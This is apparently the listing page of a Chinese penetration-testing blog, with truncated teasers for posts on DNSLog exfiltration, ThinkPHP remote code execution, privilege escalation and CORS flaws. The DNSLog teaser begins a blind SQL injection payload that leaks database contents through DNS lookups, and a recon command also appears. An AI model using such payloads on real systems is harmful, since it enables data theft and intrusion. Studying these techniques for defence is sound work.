网络安全,WEB渗透,数据安全,渗透编程,安全培训

如何低成本搭建dnslog服务器

mOon    渗透测试     827次查看    抢沙发    2019年05月18日

DNSLog,简单来说,就是通过记录对于域名的DNS请求,通过dns请求这个相对“隐蔽”的渠道,来委婉地获取到想要获得的信息。 例如,在一个针对mysql数据库的注入中,如果没有回显,可能很多时候就要歇菜。 但如果对方的数据库服务器连接公网并且是Windows机器的话,就可以用这种姿势来获取信息: SELECT LOAD_FILE(CONCAT('\\\\',(SELECT pas...

Thinkphp5.1 ~ 5.2代码执行漏洞

mOon    漏洞收集     815次查看    抢沙发    2019年05月17日

Thinkphp5.1 ~ 5.2 代码执行漏洞 需要在library/think/Error.php中设置: error_reporting(0); 据作者博客中说的: 本身项目发布就需要屏蔽异常和错误所以这个配置是一个正常的配置 http://proxy.boomeye.com:19300/wordpress/index.php/2019/01/15/th...

域渗透(提权篇)

mOon    渗透测试     976次查看    抢沙发    2019年05月11日

域渗透(提权篇) 常见信息收集 dir /a-r-d /s /b                        ...

JSONP与CORS漏洞挖掘

mOon    渗透测试     583次查看    抢沙发    2019年05月10日

前言 本文从笔者自己对同源策略的理解来谈谈与之相关的JSONP劫持和CORS错误配置这两类安全问题。   同源策略(SOP) 同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制.简单说就是浏览器的一种安全策略。 “同源”包括三个条件: ...

Linux提权之SUID

mOon    渗透测试     544次查看    抢沙发    2019年05月10日

Linux提权之SUID 介绍 PATH是Linux和类Unix操作系统中的环境变量,它指定存储可执行程序的所有bin和sbin目录。当用户在终端上运行任何命令时,它会通过PATH变量来响应用户执行的命令,向shell发送请求以搜索可执行文件。超级用户通常还具有/ sbin和/ usr / sbin条目以便于执行系统管理命令。 SUID属性一般用在可执行文件上,当用户执...

Metasploit框架中的Windows内核漏洞利用提权教程

mOon    渗透测试     535次查看    抢沙发    2019年05月09日

Metasploit框架中的Windows内核漏洞利用提权教程 Windows-Exploit-suggester Metasploit内置模块提供了各种可用于提权的local exploits,并会基于架构,平台(即运行的操作系统),会话类型和所需默认选项提供建议。这极大的节省了我们的时间,省去了我们手动搜索local exploits的麻烦。虽说如此...

四个linux提权脚本

mOon    神器下载     497次查看    抢沙发    2019年05月09日

简介 当你攻击一台计算机时可能会遇到一些拒绝执行操作的限制,就算你有一个shell也可能会遇到此问题。为了获得目标主机的完全控制权限,你需要在未被用户授权的地方绕过权限控制。你可以使用这些权限删除文件,浏览保密信息,或者安装病毒等用户讨厌的软件。 Metasploit中拥有各种奇淫巧计,让你能远程系统下尝试获取受害者电脑的系统级权限。除此之外,当你在目标机器上尝试提升...

【转载】Thinkphp5.1 ~ 5.2 全版本代码执行

mOon    代码审计     4300次查看    抢沙发    2019年01月16日

序言 最近爆出了Thinkphp5.0.*全版本代码执行,其中5.1与5.2全版本在生产环境下下同样也存在代码执行 漏洞分析: 文件位置:\thinkphp\library\think\Request.php /** * 当前的请求类型 * @access public * @param bool $ori...

【转载】ThinkPHP 5.0 * 远程代码执行漏洞分析

mOon    代码审计     2812次查看    抢沙发    2019年01月12日

ThinkPHP 5.0 * 远程代码执行漏洞分析 本文主要以官网下载的5.0.23 完整版(thinkphp_5.0.23_with_extend.zip)为例分析。 Thinkphp处理请求的关键类为Request(thinkphp/library/think/Request.php) 该类可以实现对HTTP请求的一些设置。 其中成员函数metho...

thinkphp v5.x 远程代码执行漏洞poc(附脚本)

mOon    神器下载     6491次查看    抢沙发    2018年12月12日

thinkphp v5.x 远程代码执行漏洞poc(附脚本) Introduction: 近日,thinkphp团队发布了版本更新,其中修复了一处远程代码执行漏洞,可直接getshell,影响范围:v5.x < 5.1.31,<= 5.0.23 Dependencies: pip instal...